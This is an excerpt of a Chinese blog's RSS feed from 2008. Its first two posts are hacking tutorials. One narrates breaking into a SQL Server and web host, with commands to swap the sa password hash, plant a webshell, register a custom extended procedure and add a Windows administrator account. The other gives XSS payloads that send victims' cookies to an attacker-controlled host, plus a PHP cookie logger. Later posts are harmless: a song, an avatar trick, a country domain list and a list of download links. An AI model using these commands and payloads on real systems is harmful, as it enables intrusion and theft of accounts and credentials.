先用update sysxlogins set password=(select top 1 password from
sysxlogins where name='sa') where name='a'<br/>
把SA的HASH复制过去。<br/>
然后再用update sysxlogins set password=(select top 1 password from
sysxlogins where name='b') where name='sa'<br/>
把密码修改为netpatch<br/>
修改后立即用查询分析器执行已经准备好的命令，但当命令执行完毕时，发现一个很严重的问题，就是odsole70.dll，xplog70.dll,xpstar.dll三个DLL已被删除，无法恢复我们需要的存储扩展了。如图5、如图6<br/>

<wbr></WBR><img HEIGHT="347" SRC="http://photo14.yupoo.com/20071206/115137_1663830029.jpg" WIDTH="500" BORDER="0"></IMG><wbr></WBR><br/>
<wbr></WBR><img HEIGHT="344" SRC="http://photo15.yupoo.com/20071206/115138_1139711424.jpg" WIDTH="500" BORDER="0"></IMG><wbr></WBR><br/>
再次陷入困境。在百般无耐的情况下，只能用一个没办法的点子--猜WEB目录路径。<br/>

用读文件的方法，尝试读取网站的主页。后面还是RP好，猜了4次后被我猜到了WEB目录。D:\网站名\index.asp<br/>

当文件内容被读取出来时，那个兴奋啊，于是立即用差异备份，备份了一个WEBSHELL。如图7<br/>

<wbr></WBR><img HEIGHT="300" SRC="http://photo15.yupoo.com/20071206/115135_1832152982.jpg" WIDTH="500" BORDER="0"></IMG><wbr></WBR><br/>
从WEBSHELL中找到了数据库连接文件，获得了SA的密码。<br/>
然后再从WEBSHELL上传了一个自己的存储扩展，用海阳ASP木马的的数据库管理功能，连接数据库后，用如下语句添加了一个自己的存储扩展！<br/>

use master<br/>
exec sp_addextendedproc 'xp_nspcn', 'xp_nspcn.dll'<br/>
grant exec<br/>
on xp_npsed<br/>
to public<br/>
再用自己的存储扩展执行如下语句<br/>
Exec master.dbo.xp_nspcn 'net user nspcn netpatch /add&amp;&amp;net
localgroup administrators nspcn /add'<br/>
再用添加的用户成功登陆了3389。如图8<br/>
<wbr></WBR><img HEIGHT="364" SRC="http://photo14.yupoo.com/20071206/115132_1041330281_tpixybhf.jpg" WIDTH="436" BORDER="0"></IMG><wbr></WBR><br/>
虽然进去了，但这是侥幸进去的，并不是完全靠实力进去的，心中有所不服。心想，要是现在不解决这个问题，以后碰到类似的，那不就更郁闷了。于是再次研究各个存储扩展的语法。研究后才发现了自己前面犯的三个严重错误，导致自己绕了一大圈才进去。<br/>

第一。本可以利用xp_makecab、xp_unpackcab配合404页面，获取路径！<br/>

下面是相关的SQL语句。<br/>
<br/>
Exec master..xp_makecab
'C:\WINNT\Help\iisHelp\common\404b.cab','mszip',1,'
C:\WINNT\Help\iisHelp\common\404b.htm'<br/>
--先备份404b.htm页面<br/>
Exec master..xp_makecab
'C:\WINNT\Help\iisHelp\common\metabase.cab','mszip',1,'C:\WINNT\system32\inetsrv\MetaBase.bin'<br/>

--备份metabase.bin文件到C:\WINNT\Help\iisHelp\common\目录<br/>
exec master..xp_unpackcab
'C:\WINNT\Help\iisHelp\common\metabase.cab','
C:\WINNT\Help\iisHelp\common\',1,' 404b.htm'<br/>
--将MetaBase.bin从C:\WINNT\Help\iisHelp\common\metabase.cab中解压出来，并重命名为404b.htm<br/>

然后我们访问该站不存在的文件名，就可以利用404b文件帮我们列出文件内容了。<br/>

第二。就是加SYSADMIN权限的SQL用户时漏了个逗号，导致添加帐号失败！<br/>

第三。用了笨办法来修改SA密码！<br/>
其实完全可以用exec master.dbo.sp_configure 'allow updates',
1;RECONFIGURE WITH OVERRIDE; update sysxlogins set xstatus=18 where
name='nspcn'--来提升SQL用户权限。<br/>
虽然饶了个大圈子，但却长了不少经验......值！中间曲折的过程，让自己更加懂得如何应付相关的状况。嘿嘿，不知小弟写了那么多，您是否有什么新的收获呢？<img ID="paperPicArea1" STYLE="DISPLAY: none; POSITION: relative" SRC="http://imgcache.qq.com/qzone_v4/b.gif"></IMG></DIV>
]]></description>
            <author>Хакеры</author>
            <category>技术文章</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087p3.html#comment</comments>
            <pubDate>Thu, 10 Jan 2008 12:29:39 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087p3.html</guid>
        </item>
        <item>
            <title>跨站脚本执行漏洞代码的六点思路</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087nh.html</link>
            <description><![CDATA[<div>&nbsp;
<div CLASS="ContentFont" ID="NewaspContentLabel" STYLE="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px">
<font ID="font_word" STYLE="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif">
1．&nbsp;构造一个提交，目标是能够显示用户Cookie信息：<br/>
</FONT>
<table STYLE="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" CELLSPACING="0" CELLPADDING="6" WIDTH="95%" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td STYLE="WORD-WRAP: break-word" BGCOLOR="#EFEFEF">
http://www.xxxx.net/txl/login/login.pl?username=&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp;passwd=&amp;ok.x=28&amp;ok.y=6</TD>
</TR>
</TBODY>
</TABLE>
<font ID="font_word" STYLE="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif"><br/>

2．&nbsp;如果上面的请求获得预期的效果，那么我们就可以尝试下面的请求：<br/>
</FONT>
<table STYLE="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" CELLSPACING="0" CELLPADDING="6" WIDTH="95%" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td STYLE="WORD-WRAP: break-word" BGCOLOR="#E8F4FF">
http://www.xxx.net/txl/login/login.pl?username=&lt;script&gt;window.open("http://www.notfound.org/info.php?"%2Bdocument.cookie)&lt;/script&gt;&amp;passwd=&amp;ok.x=28&amp;ok.y=6</TD>
</TR>
</TBODY>
</TABLE>
<font ID="font_word" STYLE="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif"><br/>

其中http://www.xxx.org/info.php是你能够控制的某台主机上的一个脚本，功能是获取查询字符串的信息，内容如下：<br/>
</FONT>
<table STYLE="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" CELLSPACING="0" CELLPADDING="6" WIDTH="95%" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td STYLE="WORD-WRAP: break-word" BGCOLOR="#EFEFEF">&lt;?php<br/>
$info&nbsp;=&nbsp;getenv("QUERY_STRING");<br/>

if&nbsp;($info)&nbsp;{<br/>
$fp&nbsp;=&nbsp;fopen("info.txt","a");<br/>

fwrite($fp,$info."\n");<br/>
fclose($fp);<br/>
}<br/>
header("Location:&nbsp;http://www.xxx.net");</TD>
</TR>
</TBODY>
</TABLE>
<font ID="font_word" STYLE="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif"><br/>

注："%2B"为"+"的URL编码，并且这里只能用"%2B"，因为"+"将被作为空格处理。后面的header语句则纯粹是为了增加隐蔽性。<br/>

3．&nbsp;如果上面的URL能够正确运行的话，下一步就是诱使登陆xxx.net的用户访问该URL，而我们就可以获取该用户Cookie中的敏感信息。<br/>

4.&nbsp;</FONT>
<table STYLE="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" CELLSPACING="0" CELLPADDING="6" WIDTH="95%" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td STYLE="WORD-WRAP: break-word" BGCOLOR="#E8F4FF">
&lt;IFRAME&nbsp;src="ip"&nbsp;frameBorder=0&nbsp;width=500&nbsp;scrolling=noshade&nbsp;height=400&gt;&lt;/IFRAME&gt;</TD>
</TR>
</TBODY>
</TABLE>
<font ID="font_word" STYLE="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif"><br/>

5.&nbsp;就可以自己构造一个下面的头像文件：<br/>
<br/></FONT>
<table STYLE="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" CELLSPACING="0" CELLPADDING="6" WIDTH="95%" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td STYLE="WORD-WRAP: break-word" BGCOLOR="#EFEFEF">thiz.gif<br/>
<br/>
&lt;script&gt;<br/>
window.location.href="http://c4st.xxx.net/tmp/info.php?’%2Bdocument.cookie;<br/>

&lt;/script&gt;</TD>
</TR>
</TBODY>
</TABLE>
<font ID="font_word" STYLE="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif"><br/>

6.新建一个x.gif，内容如下：<br/></FONT>
<table STYLE="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" CELLSPACING="0" CELLPADDING="6" WIDTH="95%" ALIGN="center" BORDER="0">
<tbody>
<tr>
<td STYLE="WORD-WRAP: break-word" BGCOLOR="#E8F4FF">
&lt;script&gt;alert(document.cookie)&lt;/script&gt;</TD>
</TR>
</TBODY>
</TABLE>
</DIV>
</DIV>
]]></description>
            <author>Хакеры</author>
            <category>技术文章</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087nh.html#comment</comments>
            <pubDate>Thu, 10 Jan 2008 08:44:55 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087nh.html</guid>
        </item>
        <item>
            <title>今天帮姐姐做空间，发现了个不错的歌曲，呵呵，属于轻音乐！</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087na.html</link>
            <description><![CDATA[<div>&nbsp;喜欢的一起来听听！</DIV>
<div><embed AllowScriptAccess="samedomain"  STYLE="WIDTH: 190px; HEIGHT: 45px" SRC="http://www.aslsedu.com/UpLoadFiles/xspd/2007-8/2007082914550037157.mp3" TYPE="audio/mpeg" AUTOSTART="1" LOOP="0"></EMBED></DIV>
]]></description>
            <author>Хакеры</author>
            <category>心情随笔</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087na.html#comment</comments>
            <pubDate>Thu, 10 Jan 2008 08:22:39 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087na.html</guid>
        </item>
        <item>
            <title>头像一刷新就换</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087iu.html</link>
            <description><![CDATA[<div>&nbsp;
<table STYLE="TABLE-LAYOUT: fixed">
<tbody>
<tr>
<td>
<div CLASS="cnt">新建一个TXT文本,写上<br/>
<font COLOR="#FF0000">&lt;?readfile(rand(0,5).'.gif');?&gt;</FONT><br/>
保存<br/>
重命名为index.php<br/>
找5张gif格式的图片和php文件一起传到<span CLASS="t_tag" HREF="tag.php?name=%BF%D5%BC%E4">空间</SPAN>的一个文件夹里面<br/>
头像路径<font COLOR="#FF0000">http://域名/文件夹/index.php?.gif</FONT></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</DIV>
]]></description>
            <author>Хакеры</author>
            <category>资源共享</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087iu.html#comment</comments>
            <pubDate>Thu, 10 Jan 2008 01:39:50 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087iu.html</guid>
        </item>
        <item>
            <title>各国域名后缀</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087im.html</link>
            <description><![CDATA[<div>&nbsp;A<br/>
.ac 亚森松岛<br/>
.ad 安道尔<br/>
.ae 阿拉伯联合酋长国<br/>
.af 阿富汗<br/>
.ag 安提瓜和巴布达<br/>
.ai 安圭拉<br/>
.al 阿尔巴尼亚<br/>
.am 亚美尼亚<br/>
.an 荷属安地列斯群岛<br/>
.ao 安哥拉<br/>
.aq 南极洲<br/>
.ar 阿根廷<br/>
.as 美属萨摩亚<br/>
.at 奥地利<br/>
.au 澳大利亚<br/>
.aw 阿鲁巴<br/>
.az 阿塞拜疆<br/>
<br/>
B<br/>
.ba 波斯尼亚和黑塞哥维那<br/>
.bb 巴巴多斯<br/>
.bd 孟加拉国<br/>
.be 比利时<br/>
.bf 布基纳法索<br/>
.bg 保加利亚<br/>
.bh 巴林<br/>
.bi 布隆迪<br/>
.bj 贝宁<br/>
.bm 百慕大<br/>
.bn 文莱<br/>
.bo 玻利维亚<br/>
.br 巴西<br/>
.bs 巴哈马<br/>
.bt 不丹<br/>
.bv 布维岛<br/>
.bw 博茨瓦纳<br/>
.by 白俄罗斯<br/>
.bz 伯利兹<br/>
<br/>
C<br/>
.ca 加拿大<br/>
.cc 可可群岛<br/>
.cd 刚果民主共和国<br/>
.cf 中非共和国<br/>
.cg 刚果<br/>
.ch 瑞士<br/>
.ci 科特迪瓦<br/>
.ck 库克群岛<br/>
.cl 智利<br/>
.cm 喀麦隆<br/>
.cn 中国大陆<br/>
.co 哥伦比亚<br/>
.cr 哥斯达黎加<br/>
.cu 古巴<br/>
.cv 佛得角<br/>
.cx 圣诞岛<br/>
.cy 塞浦路斯<br/>
.cz 捷克共和国<br/>
<br/>
D<br/>
.de 德国<br/>
.dj 吉布提<br/>
.dk 丹麦<br/>
.dm 多米尼克<br/>
.do 多米尼加共和国<br/>
.dz 阿尔及利亚<br/>
<br/>
E<br/>
.ec 厄瓜多尔<br/>
.ee 爱沙尼亚<br/>
.eg 埃及<br/>
.eh 西撒哈拉<br/>
.er 厄立特里亚<br/>
.es 西班牙<br/>
.et 埃塞俄比亚<br/>
.eu 欧洲联盟<br/>
<br/>
F<br/>
.fi 芬兰<br/>
.fj 斐济<br/>
.fk 福克兰群岛<br/>
.fm 密克罗尼西亚联邦<br/>
.fo 法罗群岛<br/>
.fr 法国<br/>
<br/>
G<br/>
.ga 加蓬<br/>
.gd 格林纳达<br/>
.ge 格鲁吉亚<br/>
.gf 法属圭亚那<br/>
.gg 格恩西岛<br/>
.gh 加纳<br/>
.gi 直布罗陀<br/>
.gl 格陵兰<br/>
.gm 冈比亚<br/>
.gn 几内亚<br/>
.gp 瓜德罗普<br/>
.gq 赤道几内亚<br/>
.gr 希腊<br/>
.gs 南乔治亚岛和南桑德韦奇岛<br/>
.gt 危地马拉<br/>
.gu 关岛<br/>
.gw 几内亚比绍<br/>
.gy 圭亚那<br/>
<br/>
H<br/>
.hk 香港<br/>
.hm 赫德和麦克唐纳群岛<br/>
.hn 洪都拉斯<br/>
.hr 克罗地亚<br/>
.ht 海地<br/>
.hu 匈牙利<br/>
<br/>
I<br/>
.id 印度尼西亚<br/>
.ie 爱尔兰<br/>
.il 以色列<br/>
.im 马恩岛<br/>
.in 印度<br/>
.io 英属印度洋地区<br/>
.iq 伊拉克<br/>
.ir 伊朗<br/>
.is 冰岛<br/>
.it 意大利<br/>
<br/>
J<br/>
.je 泽西岛<br/>
.jm 牙买加<br/>
.jo 约旦<br/>
.jp 日本<br/>
<br/>
K<br/>
.ke 肯尼亚<br/>
.kg 吉尔吉斯斯坦<br/>
.kh 柬埔寨<br/>
.ki 基里巴斯<br/>
.km 科摩罗<br/>
.kn 圣基茨和尼维斯<br/>
.kp 朝鲜<br/>
.kr 韩国<br/>
.kw 科威特<br/>
.ky 开曼群岛<br/>
.kz 哈萨克斯坦<br/>
<br/>
L<br/>
.la 老挝<br/>
.lb 黎巴嫩<br/>
.lc 圣卢西亚<br/>
.li 列支敦士登<br/>
.lk 斯里兰卡<br/>
.lr 利比里亚<br/>
.ls 莱索托<br/>
.lt 立陶宛<br/>
.lu 卢森堡<br/>
.lv 拉脱维亚<br/>
.ly 利比亚<br/>
<br/>
M<br/>
.ma 摩洛哥<br/>
.mc 摩纳哥<br/>
.md 摩尔多瓦<br/>
.mg 马达加斯加<br/>
.mh 马绍尔群岛<br/>
.mk 马其顿<br/>
.ml 马里<br/>
.mm 缅甸<br/>
.mn 蒙古<br/>
.mo 中国澳门<br/>
.mp 北马里亚纳群岛<br/>
.mq 马提尼克岛<br/>
.mr 毛里塔尼亚<br/>
.ms 蒙特塞拉特岛<br/>
.mt 马耳他<br/>
.mu 毛里求斯<br/>
.mv 马尔代夫<br/>
.mw 马拉维<br/>
.mx 墨西哥<br/>
.my 马来西亚<br/>
.mz 莫桑比克<br/>
<br/>
N<br/>
.na 纳米比亚<br/>
.nc 新喀里多尼亚<br/>
.ne 尼日尔<br/>
.nf 诺福克岛<br/>
.ng 尼日利亚<br/>
.ni 尼加拉瓜<br/>
.nl 荷兰<br/>
.no 挪威<br/>
.np 尼泊尔<br/>
.nr 瑙鲁<br/>
.nu 纽埃岛<br/>
.nz 新西兰<br/>
<br/>
O<br/>
.om 阿曼<br/>
<br/>
P<br/>
.pa 巴拿马<br/>
.pe 秘鲁<br/>
.pf 法属波利尼西亚<br/>
.pg 巴布亚新几内亚<br/>
.ph 菲律宾<br/>
.pk 巴基斯坦<br/>
.pl 波兰<br/>
.pm 圣皮埃尔岛及密客隆岛<br/>
.pn 皮特凯恩群岛<br/>
.pr 波多黎各<br/>
.ps 巴勒斯坦<br/>
.pt 葡萄牙<br/>
.pw 帕劳<br/>
.py 巴拉圭<br/>
<br/>
Q<br/>
.qa 卡塔尔<br/>
<br/>
R<br/>
.re 留尼汪<br/>
.ro 罗马尼亚<br/>
.ru 俄罗斯<br/>
.rw 卢旺达<br/>
<br/>
S<br/>
.sa 沙特阿拉伯<br/>
.sb 所罗门群岛<br/>
.sc 塞舌尔<br/>
.sd 苏丹<br/>
.se 瑞典<br/>
.sg 新加坡<br/>
.sh 圣赫勒拿岛<br/>
.si 斯洛文尼亚<br/>
.sj 斯瓦尔巴岛和扬马延岛<br/>
.sk 斯洛伐克<br/>
.sl 塞拉利昂<br/>
.sm 圣马力诺<br/>
.sn 塞内加尔<br/>
.so 索马里<br/>
.sr 苏里南<br/>
.st 圣多美和普林西比<br/>
.sv 萨尔瓦多<br/>
.sy 叙利亚<br/>
.sz 斯威士兰<br/>
<br/>
T<br/>
.tc 特克斯和凯科斯群岛<br/>
.td 乍得<br/>
.tf 法属南部领土<br/>
.tg 多哥<br/>
.th 泰国<br/>
.tj 塔吉克斯坦<br/>
.tk 托克劳<br/>
.tl 东帝汶（新域名）<br/>
.tm 土库曼斯坦<br/>
.tn 突尼斯<br/>
.to 汤加<br/>
.tp 东帝汶（旧域名，尚未停用）<br/>
.tr 土耳其<br/>
.tt 特立尼达和多巴哥<br/>
.tv 图瓦卢<br/>
.tw 台湾<br/>
.tz 坦桑尼亚<br/>
<br/>
U<br/>
.ua 乌克兰<br/>
.ug 乌干达<br/>
.uk 英国<br/>
.um 美国本土外小岛屿<br/>
.us 美国<br/>
.uy 乌拉圭<br/>
.uz 乌兹别克斯坦<br/>
<br/>
V<br/>
.va 梵蒂冈<br/>
.vc 圣文森特和格林纳丁斯<br/>
.ve 委内瑞拉<br/>
.vg 英属维尔京群岛<br/>
.vi 美属维尔京群岛<br/>
.vn 越南<br/>
.vu 瓦努阿图<br/>
<br/>
W<br/>
.wf 瓦利斯和富图纳群岛<br/>
.ws 萨摩亚<br/>
<br/>
Y<br/>
.ye 也门<br/>
.yt 马约特岛<br/>
.yu 塞尔维亚和黑山<br/>
.yr 耶纽<br/>
<br/>
Z<br/>
.za 南非<br/>
.zm 赞比亚<br/>
.zw 津巴布韦<br/></DIV>
]]></description>
            <author>Хакеры</author>
            <category>个人经验</category>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087im.html#comment</comments>
            <pubDate>Thu, 10 Jan 2008 01:00:40 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087im.html</guid>
        </item>
        <item>
            <title>呵呵，为姐姐做的MUVEE！！！有兴趣的来看看，想做的找我，哈</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087ih.html</link>
            <description><![CDATA[<div><embed ID="articlevblog" NAME="articlevblog" SRC="http://you.video.sina.com.cn/b/vblog_player.swf?vid=10324581&amp;uid=1347681912&amp;isnew=1" WIDTH="460" HEIGHT="460" TYPE="application/x-shockwave-flash" FLASHVARS="url=http://you.video.sina.com.cn/b/vblog_player.swf?vid=10324581&amp;uid=1347681912&amp;isnew=1" ALLOWSCRIPTACCESS="always" ALLOWFULLSCREEN="true" QUALITY="high"></EMBED>&nbsp;</DIV>
]]></description>
            <author>Хакеры</author>
            <comments>http://blog.sina.com.cn/s/blog_5053fe78010087ih.html#comment</comments>
            <pubDate>Thu, 10 Jan 2008 00:23:54 GMT+8</pubDate>
            <guid>http://blog.sina.com.cn/s/blog_5053fe78010087ih.html</guid>
        </item>
        <item>
            <title>50个计算机热门视频教程免费下载</title>
            <link>http://blog.sina.com.cn/s/blog_5053fe78010087fn.html</link>
            <description><![CDATA[<div>&nbsp;01. 3ds max 8材质与贴图艺术随书光盘
<a TITLE="http://www.it270.com/topics/0000000014/" HREF="http://www.it270.com/topics/0000000014/" TARGET="_blank">http://www.it270.com/topics/0000000014/</A><br/>
02. 3dsmax动画技术大全动画·特效篇随书光盘 <a TITLE="http://www.it270.com/topics/0000000015/" HREF="http://www.it270.com/topics/0000000015/" TARGET="_blank">http://www.it270.com/topics/0000000015/</A><br/>
03. ASP数据库系统开发案例精选（光盘） <a TITLE="http://www.it270.com/topics/0000000016/" HREF="http://www.it270.com/topics/0000000016/" TARGET="_blank">http://www.it270.com/topics/0000000016/</A><br/>
04. Cisco CCNA视频教程20集 <a TITLE="http://www.it270.com/topics/0000000017/" HREF="http://www.it270.com/topics/0000000017/" TARGET="_blank">http://www.it270.com/topics/0000000017/</A><br/>
05. CorelDRAW 平面设计完全攻略随书光盘 <a TITLE="http://www.it270.com/topics/0000000019/" HREF="http://www.it270.com/topics/0000000019/" TARGET="_blank">http://www.it270.com/topics/0000000019/</A><br/>
06. DREAMWEAVER 8+ASP从入门到精通随书光盘 <a TITLE="http://www.it270.com/topics/0000000020/" HREF="http://www.it270.com/topics/0000000020/" TARGET="_blank">http://www.it270.com/topics/0000000020/</A><br/>
07. Photoshop cs2 纸制品设计范例参考随书CD <a TITLE="http://www.it270.com/topics/0000000027/" HREF="http://www.it270.com/topics/0000000027/" TARGET="_blank">http://www.it270.com/topics/0000000027/</A><br/>
08. Photoshop CS2金鹰Flash视频教程200讲完美版 <a TITLE="http://www.it270.com/topics/0000000028/" HREF="http://www.it270.com/topics/0000000028/" TARGET="_blank">http://www.it270.com/topics/0000000028/</A><br/>
09. SQL Server 2005 ETL专家系列课程 <a TITLE="http://www.it270.com/topics/0000000031/" HREF="http://www.it270.com/topics/0000000031/" TARGET="_blank">http://www.it270.com/topics/0000000031/</A><br/>
10. JSP动态网站开发基础练习 典型案例 <a TITLE="http://www.it270.com/topics/0000000033/" HREF="http://www.it270.com/topics/0000000033/" TARGET="_blank">http://www.it270.com/topics/0000000033/</A><br/>
11. 编程之道—ASP数据库编程入门 <a TITLE="http://www.it270.com/topics/0000000034/" HREF="http://www.it270.com/topics/0000000034/" TARGET="_blank">http://www.it270.com/topics/0000000034/</A><br/>
12. 编程之道—C#程序设计入门 <a TITLE="http://www.it270.com/topics/0000000036/" HREF="http://www.it270.com/topics/0000000036/" TARGET="_blank">http://www.it270.com/topics/0000000036/</A><br/>
13. 编程之道—JSP数据库编程入门 <a TITLE="http://www.it270.com/topics/0000000039/" HREF="http://www.it270.com/topics/0000000039/" TARGET="_blank">http://www.it270.com/topics/0000000039/</A><br/>
14. 编程之道—VC.NET程序设计入门 <a TITLE="http://www.it270.com/topics/0000000040/" HREF="http://www.it270.com/topics/0000000040/" TARGET="_blank">http://www.it270.com/topics/0000000040/</A><br/>
15. 多媒体课堂之平面设计师必修多媒体光盘 <a TITLE="http://www.it270.com/topics/0000000043/" HREF="http://www.it270.com/topics/0000000043/" TARGET="_blank">http://www.it270.com/topics/0000000043/</A><br/>
16. 黑鹰基地ASP特训班教程 <a TITLE="http://www.it270.com/topics/0000000044/" HREF="http://www.it270.com/topics/0000000044/" TARGET="_blank">http://www.it270.com/topics/0000000044/</A><br/>
17. 黑鹰基地VB教程 <a TITLE="http://www.it270.com/topics/0000000045/" HREF="http://www.it270.com/topics/0000000045/" TARGET="_blank">http://www.it270.com/topics/0000000045/</A><br/>
18. 黑鹰基地Win2003系列视频教程 <a TITLE="http://www.it270.com/topics/0000000046/" HREF="http://www.it270.com/topics/0000000046/" TARGET="_blank">http://www.it270.com/topics/0000000046/</A><br/>
19. 即学即会 3DS Max8.0 实战特训 <a TITLE="http://www.it270.com/topics/0000000047/" HREF="http://www.it270.com/topics/0000000047/" TARGET="_blank">http://www.it270.com/topics/0000000047/</A><br/>
20. 浪曦视频教程ASP.NET <a TITLE="http://www.it270.com/topics/0000000049/" HREF="http://www.it270.com/topics/0000000049/" TARGET="_blank">http://www.it270.com/topics/0000000049/</A><br/>
21. 浪曦视频教程C# <a TITLE="http://www.it270.com/topics/0000000050/" HREF="http://www.it270.com/topics/0000000050/" TARGET="_blank">http://www.it270.com/topics/0000000050/</A><br/>
22. 浪曦视频教程J2EE <a TITLE="http://www.it270.com/topics/0000000051/" HREF="http://www.it270.com/topics/0000000051/" TARGET="_blank">http://www.it270.com/topics/0000000051/</A><br/>
23. 上海交大C++面向对象程序设计 <a TITLE="http://www.it270.com/topics/0000000053/" HREF="http://www.it270.com/topics/0000000053/" TARGET="_blank">http://www.it270.com/topics/0000000053/</A><br/>
24. 上海交大计算机网络 <a TITLE="http://www.it270.com/topics/0000000055/" HREF="http://www.it270.com/topics/0000000055/" TARGET="_blank">http://www.it270.com/topics/0000000055/</A><br/>
25. 上海交大网络安全 <a TITLE="http://www.it270.com/topics/0000000057/" HREF="http://www.it270.com/topics/0000000057/" TARGET="_blank">http://www.it270.com/topics/0000000057/</A><br/>
26. 网络应用深入实践 <a TITLE="http://www.it270.com/topics/0000000062/" HREF="http://www.it270.com/topics/0000000062/" TARGET="_blank">http://www.it270.com/topics/0000000062/</A><br/>
27. 网络狂人大全集—网站完全制作 <a TITLE="http://www.it270.com/topics/0000000061/" HREF="http://www.it270.com/topics/0000000061/" TARGET="_blank">http://www.it270.com/topics/0000000061/</A><br/>
28. 思达网络教育学校网络工程师多媒体视频学习课件 <a TITLE="http://www.it270.com/topics/0000000060/" HREF="http://www.it270.com/topics/0000000060/" TARGET="_blank">http://www.it270.com/topics/0000000060/</A><br/>
29. 美河制作上海交大最新版JAVA程序设计全 <a TITLE="http://www.it270.com/topics/0000000058/" HREF="http://www.it270.com/topics/0000000058/" TARGET="_blank">http://www.it270.com/topics/0000000058/</A><br/>
30. 翁恺-JAVA语言 <a TITLE="http://www.it270.com/topics/0000000064/" HREF="http://www.it270.com/topics/0000000064/" TARGET="_blank">http://www.it270.com/topics/0000000064/</A><br/>
31. 由尚德系列讲座之linux内核编程入门 <a TITLE="http://www.it270.com/topics/0000000066/" HREF="http://www.it270.com/topics/0000000066/" TARGET="_blank">http://www.it270.com/topics/0000000066/</A><br/>
32. 由尚德系列讲座之linux内核编程进阶篇 <a TITLE="http://www.it270.com/topics/0000000067/" HREF="http://www.it270.com/topics/0000000067/" TARGET="_blank">http://www.it270.com/topics/0000000067/</A><br/>
33. 网页设计与网站架设--CD1--Dreamweaver <a TITLE="http://www.it270.com/topics/0000000068/" HREF="http://www.it270.com/topics/0000000068/" TARGET="_blank">http://www.it270.com/topics/0000000068/</A><br/>
34. 网页设计与网站架设--CD2--Fireworks <a TITLE="http://www.it270.com/topics/0000000069/" HREF="http://www.it270.com/topics/0000000069/" TARGET="_blank">http://www.it270.com/topics/0000000069/</A><br/>
35. 网页设计与网站架设--CD3--Flash&amp;photoshop <a TITLE="http://www.it270.com/topics/0000000070/" HREF="http://www.it270.com/topics/0000000070/" TARGET="_blank">http://www.it270.com/topics/0000000070/</A><br/>
36. 网页设计与网站架设--CD4--用代码设计网页 <a TITLE="http://www.it270.com/topics/0000000071/" HREF="http://www.it270.com/topics/0000000071/" TARGET="_blank">http://www.it270.com/topics/0000000071/</A><br/>
37. 网页设计与网站架设--CD5--ASP数据库与程序设计 <a TITLE="http://www.it270.com/topics/0000000072/" HREF="http://www.it270.com/topics/0000000072/" TARGET="_blank">http://www.it270.com/topics/0000000072/</A><br/>
38. 网页设计与网站架设--CD6--高效架设局域网与应用服务器 <a TITLE="http://www.it270.com/topics/0000000073/" HREF="http://www.it270.com/topics/0000000073/" TARGET="_blank">http://www.it270.com/topics/0000000073/</A><br/>
39. 逐步精通数据库MYSQL视频 <a TITLE="http://www.it270.com/topics/0000000065/" HREF="http://www.it270.com/topics/0000000065/" TARGET="_blank">http://www.it270.com/topics/0000000065/</A><br/>
40. 边学边用C语言视频14部 <a TITLE="http://www.it270.com/topics/0000000032/" HREF="http://www.it270.com/topics/0000000032/" TARGET="_blank">http://www.it270.com/topics/0000000032/</A><br/>
41. 浙江大学胡晓军中间件技术j2ee视频教程 <a TITLE="http://www.it270.com/topics/0000000174/" HREF="http://www.it270.com/topics/0000000174/" TARGET="_blank">http://www.it270.com/topics/0000000174/</A><br/>
